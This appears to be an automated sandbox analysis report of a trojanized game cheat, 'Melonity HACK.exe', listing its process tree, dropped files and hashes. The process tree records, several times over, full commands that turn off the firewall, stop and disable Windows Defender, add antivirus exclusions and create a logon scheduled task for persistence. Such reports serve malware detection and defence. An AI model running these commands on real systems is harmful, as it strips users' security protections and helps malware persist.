C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C515.tmp\C516.tmp\C517.bat "C:\ProgramData\Task Host\svchost.exe""8⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6828 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7040 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7164 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7200 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6984 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6404 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
- Checks computer location settings
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "3⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off4⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
- Checks computer location settings
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "3⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off4⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f4⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\ProgramData\Defender\min.exe"C:\ProgramData\Defender\min.exe"3⤵
-
C:\ProgramData\Defender\Start.exeC:\ProgramData\Defender\Start.exe4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C757.tmp\C758.tmp\C759.bat C:\ProgramData\Defender\Start.exe"5⤵
-
C:\Windows\system32\timeout.exeTIMEOUT /t 106⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps18⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x0xrdeww\x0xrdeww.cmdline"9⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF117.tmp" "c:\Users\Admin\AppData\Local\Temp\x0xrdeww\CSCD41496A7B9DC475C87FF9C48CB44F9B.TMP"10⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "10⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"11⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"11⤵
- Kills process with taskkill
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE86.tmp\EE87.tmp\EE88.bat "C:\ProgramData\Task Host\svchost.exe""8⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE09.tmp\EE0A.tmp\EE0B.bat "C:\ProgramData\Task Host\svchost.exe""7⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C544.tmp\C545.tmp\C546.bat "C:\ProgramData\Task Host\svchost.exe""1⤵
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"2⤵
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\Defender\ab.exeFilesize
766KB
MD5fc846968d7791ad9d6392bdd6dec80fa
SHA1bee026f7dcea0d2643807de0930c8542f4dc93c5
SHA256952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b
SHA512c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6
-
C:\ProgramData\Defender\ab.exeFilesize
766KB
MD5fc846968d7791ad9d6392bdd6dec80fa
SHA1bee026f7dcea0d2643807de0930c8542f4dc93c5
SHA256952b6e0b3b60b25837476568f202546d9c76aef7db5756f4e358f291fe43b14b
SHA512c7133319aa32276d86fc08262dc63f5b97ff55cc1a2fe8d29654ec6178a1bd7068f53c7527edd6148d71c3a50bec9a1a897119f665454bd89fd4c86cf55c7dd6
-
C:\ProgramData\Defender\ac.exeFilesize
14.7MB
MD568576adb3317d4277c8b910754db9dd6
SHA109dc1d7bf0c4f2e1eaaeffc2207435c8f02f75d6
SHA256be2d385b186b860114e69d949a399ac1de1d99bc93f5dde9f3828f71034b386e
SHA512a5f7be69aeda4d80024ff1bd17688dc0f20aef3ef53e240fd994effb407656a95dbd0ffb2b0d772d73fb13b9652a77eb30d130b252f6ad0f25d6f6fe4b4931c2
-
C:\ProgramData\Defender\ac1.exeFilesize
476KB
MD54636b36b24a7b8b94faa114597199c9e
SHA1103de7fd72fdcc57e57fd343cc4fcf71acdb9826
SHA256d3466d1faf5a824a558f9118d022af78f729f8c83b00630a7c199c58545e0aa5
SHA5122024be83921488dcab0cdee2cd6aeb7dc5c2e894ede1bdc6c5ea6b8c685c952a4b8b9991721d3f98c4d8e7b9431e551046bac9201f6349efc3a3a87e50e4fe01
-
C:\ProgramData\Defender\ac1.exeFilesize
476KB
MD54636b36b24a7b8b94faa114597199c9e
SHA1103de7fd72fdcc57e57fd343cc4fcf71acdb9826
SHA256d3466d1faf5a824a558f9118d022af78f729f8c83b00630a7c199c58545e0aa5
SHA5122024be83921488dcab0cdee2cd6aeb7dc5c2e894ede1bdc6c5ea6b8c685c952a4b8b9991721d3f98c4d8e7b9431e551046bac9201f6349efc3a3a87e50e4fe01
-
C:\ProgramData\Defender\d.exeFilesize
127KB
MD5ad406b55025faeb28a87788f8c00539b
SHA17ba1ac8867e1674217dd581894a3943a7c982c7c
SHA256c3ba2d27c31e46fa30805cdc5a19ef3c3638e8b2076997730dc3f5eb7cc28981
SHA5124670fa77b9493192fd37f19248742aeb3860364780954f4590ef2fa7d3914470d13e9fefe3acf767f11abc283e312a838e1fb4bc6d2c893ea4e663f434a237bf
-
C:\ProgramData\Defender\d.exeFilesize
127KB
MD5ad406b55025faeb28a87788f8c00539b
SHA17ba1ac8867e1674217dd581894a3943a7c982c7c
SHA256c3ba2d27c31e46fa30805cdc5a19ef3c3638e8b2076997730dc3f5eb7cc28981
SHA5124670fa77b9493192fd37f19248742aeb3860364780954f4590ef2fa7d3914470d13e9fefe3acf767f11abc283e312a838e1fb4bc6d2c893ea4e663f434a237bf
-
C:\ProgramData\Defender\d.vbsFilesize
288B
MD5f412cd3e21869e9bed5b84a391c3e923
SHA1c9a9f3461de32ce457993cb862a3a6433baf5501
SHA256b9938c9ae8d9ef0c5187598882ec330aca856ae9202ba40affc766aad28ba348
SHA5123016e75e5d01d53293ac25a02bbec928049d241452448f3b91810eeda4c84acc36ed28dce6094752a8edec0b438369dbeaa3c0aa8538690af4e7ac318fea34ce
-
C:\ProgramData\Defender\dd.vbsFilesize
288B
MD57f6aeff67cf0ff0525016e06273317c5
SHA1faed754543e1c18926bea3e076c08a6faf650dcc
SHA2567ba00db5d700ccb9208db43b3f373e054d61594873d05430404f620d4d0deea1
SHA512fc78f91ca1774aae9cb798aefb53b57464c3ac3c8cf05d966b71a077bf4b065822a46270ea1289d25f7ac7190f89e537759996f6ee4caa4179a5309b43ed8a40
-
C:\ProgramData\Defender\t.batFilesize
732B
MD58c526aef3d9ff3365c92877aa3069758
SHA1559c2987c0209be0fe16315c553a6505323fc8db
SHA256d2873016df2a468a0d506ebc7bde3c413dd9ae5ece08073ede7e9e263bd59d9b
SHA512ea16fa435a24fea5ca1f1c4abf6c05556b877e44668d6a587ed8c3d6a2d79d4dcd85d238a297f1ff0f2e362e6a5995217ede0f6dbcc15c5a12176f9bdba0bd5c
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\ProgramData\Defender\u.exeFilesize
14KB
MD573bdcc03365a915741a98a9bf7a0d05a
SHA10839bdf18a803dfaacc20be0532094d191291924
SHA2569108afeecaa421ae471f120f56597298e2a5b710cbdf74ebd93829c158ce505f
SHA512e8216eabd324e6622685776249a674bece371178f5ddf895431c0079f5ee55b6cfda9ec8cb80ae7da3771f75701156eb28f304e25f8af40fe677bb1920ea8c86
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\u.exe.logFilesize
42B
MD584cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\CachesMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
